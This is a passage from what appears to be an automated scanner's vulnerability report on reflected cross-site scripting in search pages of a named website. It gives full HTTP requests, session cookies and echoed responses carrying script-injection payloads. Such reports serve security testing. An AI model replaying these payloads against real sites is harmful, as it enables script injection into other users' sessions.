Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/search.php?keyword=search...2c6a9<a>de7512f6c11&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1808. http://www.resellerbase.com/detail/22/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ccfc3<script>alert(1)</script>ff30ec41a68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&ccfc3<script>alert(1)</script>ff30ec41a68=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&ccfc3<script>alert(1)</script>ff30ec41a68=1 was not found on this server.</p>
...[SNIP]...

2.1809. http://www.resellerbase.com/detail/22/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d98d6<a>2f6e10b2a8a was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2d98d6<a>2f6e10b2a8a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2d98d6<a>2f6e10b2a8a was not found on this server.</p>
...[SNIP]...

2.1810. http://www.resellerbase.com/detail/22/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7def6<script>alert(1)</script>437c914bc31 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7def6<script>alert(1)</script>437c914bc31/22/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7def6<script>alert(1)</script>437c914bc31/22/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1811. http://www.resellerbase.com/detail/22/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3d949<script>alert(1)</script>40d59e1fc3f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/223d949<script>alert(1)</script>40d59e1fc3f/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/223d949<script>alert(1)</script>40d59e1fc3f/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1812. http://www.resellerbase.com/detail/22/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 85f36<script>alert(1)</script>17cb4cdcb50 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes85f36<script>alert(1)</script>17cb4cdcb50/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes85f36<script>alert(1)</script>17cb4cdcb50/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1813. http://www.resellerbase.com/detail/22/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6cac7<script>alert(1)</script>06396d1c208 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos6cac7<script>alert(1)</script>06396d1c208/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos6cac7<script>alert(1)</script>06396d1c208/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1814. http://www.resellerbase.com/detail/22/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 51e26<script>alert(1)</script>b8655577bc3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/search.php51e26<script>alert(1)</script>b8655577bc3?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/search.php51e26<script>alert(1)</script>b8655577bc3?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1815. http://www.resellerbase.com/detail/22/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload a8603<a>f87d1bac6ba was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/kosmos/search.php?keyword=search...&Submit3=Searcha8603<a>f87d1bac6ba&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/search.php?keyword=search...&Submit3=Searcha8603<a>f87d1bac6ba&opt=2 was not found on this server.</p>
...[SNIP]...

2.1816. http://www.resellerbase.com/detail/22/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 6b5a5<a>a8aa3c20ab7 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/kosmos/search.php?keyword=search...6b5a5<a>a8aa3c20ab7&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/search.php?keyword=search...6b5a5<a>a8aa3c20ab7&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1817. http://www.resellerbase.com/detail/22/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bf2d5<script>alert(1)</script>a387b484003 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&bf2d5<script>alert(1)</script>a387b484003=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&bf2d5<script>alert(1)</script>a387b484003=1 was not found on this server.</p>
...[SNIP]...

2.1818. http://www.resellerbase.com/detail/22/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 553f9<a>ceed9238982 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2553f9<a>ceed9238982 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2553f9<a>ceed9238982 was not found on this server.</p>
...[SNIP]...

2.1819. http://www.resellerbase.com/detail/22/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 769fa<script>alert(1)</script>113036dc008 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail769fa<script>alert(1)</script>113036dc008/22/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail769fa<script>alert(1)</script>113036dc008/22/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1820. http://www.resellerbase.com/detail/22/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 439e1<script>alert(1)</script>6b5453a3b34 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22439e1<script>alert(1)</script>6b5453a3b34/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22439e1<script>alert(1)</script>6b5453a3b34/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1821. http://www.resellerbase.com/detail/22/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 38a4a<script>alert(1)</script>441c41bac28 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes38a4a<script>alert(1)</script>441c41bac28/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes38a4a<script>alert(1)</script>441c41bac28/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1822. http://www.resellerbase.com/detail/22/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e2a8b<script>alert(1)</script>0f9a7dbabc0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/search.phpe2a8b<script>alert(1)</script>0f9a7dbabc0?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/search.phpe2a8b<script>alert(1)</script>0f9a7dbabc0?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1823. http://www.resellerbase.com/detail/22/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 5fd24<a>207376e8f4 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/search.php?keyword=search...&Submit3=Search5fd24<a>207376e8f4&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/search.php?keyword=search...&Submit3=Search5fd24<a>207376e8f4&opt=2 was not found on this server.</p>
...[SNIP]...

2.1824. http://www.resellerbase.com/detail/22/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 36ce0<a>e09abda054 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/search.php?keyword=search...36ce0<a>e09abda054&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/search.php?keyword=search...36ce0<a>e09abda054&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1825. http://www.resellerbase.com/detail/22/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 37cc2<script>alert(1)</script>4be5ef95ff0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/search.php?keyword=search...&Submit3=Search&opt=2&37cc2<script>alert(1)</script>4be5ef95ff0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
